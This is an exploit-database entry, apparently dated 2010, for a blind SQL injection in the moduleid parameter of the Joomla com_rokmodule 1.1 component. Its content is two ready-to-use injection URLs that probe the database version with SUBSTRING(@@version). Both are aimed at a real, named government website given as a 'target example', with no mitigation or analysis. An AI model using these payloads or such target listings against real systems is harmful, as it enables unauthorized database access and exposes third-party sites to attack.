id: 11721
date: 04/11/2010
title: Joomla Component com_rokmodule Blind SQLi [moduleid] Vulnerability
author: AntiSecurity
cves: 

==================================================================
Joomla Component com_rokmodule Blind SQLi [moduleid] Vulnerability
==================================================================

# Exploit Title:
Joomla Component RokModule Blind SQLi [moduleid] Vulnerability
 
# Date:
April 11 2010
 
# Author:
AntiSecurity
 
# Software Link:
http://www.rockettheme.com/
 
# Version:
com_rokmodule version 1.1
 
# Tested on:
Linux
 
# Target example
http://www.senatedem.ilga.gov/index.php?option=com_rokmodule&tmpl=component&type=raw&moduleid=260+AND+SUBSTRING(@@version,1,1)=5
http://www.senatedem.ilga.gov/index.php?option=com_rokmodule&tmpl=component&type=raw&moduleid=260+AND+SUBSTRING(@@version,1,1)=4



#  0day.today [2023-03-26]  #